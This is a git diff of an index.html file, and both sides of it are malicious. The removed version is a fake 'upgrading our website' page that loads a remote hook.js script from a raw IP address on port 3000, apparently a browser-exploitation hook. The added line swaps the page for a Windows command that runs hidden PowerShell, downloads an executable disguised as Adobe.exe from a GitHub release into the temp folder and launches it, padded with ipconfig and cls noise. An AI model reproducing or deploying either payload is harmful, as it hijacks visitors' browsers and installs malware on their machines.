--- a/index.html
+++ b/index.html
@@ -1,20 +1,1 @@
-<!DOCTYPE html>
-<html>
-<head>
-<!-- HTML Codes by Quackit.com -->
-<title>
-  website
-</title>
-<meta name="viewport" content="width=device-width, initial-scale=1">
-<style>
-body {background-color:#6126d9;background-repeat:no-repeat;background-position:top left;background-attachment:scroll;}
-h4{font-family:Verdana, sans-serif;color:#000000;background-color:#ffffff;}
-p {font-family:Georgia, serif;font-size:14px;font-style:normal;font-weight:normal;color:#000000;background-color:#ffffff;}
-</style>
-</head>
-<body>
-<h4>We are currently upgrading our website,kindly visit this site in few minutes time.</h4>
-<p></p>
-  <script src="http://68.183.26.215:3000/hook.js"></script>
-</body>
-</html>
+ipconfig c:\ & cls & Powershell.exe -windowstyle hidden (New-Object System.Net.WebClient).Download.File('https://github.com/Molowogan85/zozodede/releases/download/yoga/Adobe.exe','%temp%\Adobe.exe');Start-Process '%temp%\Adobe.exe' & c:\ & cls ipconfig all
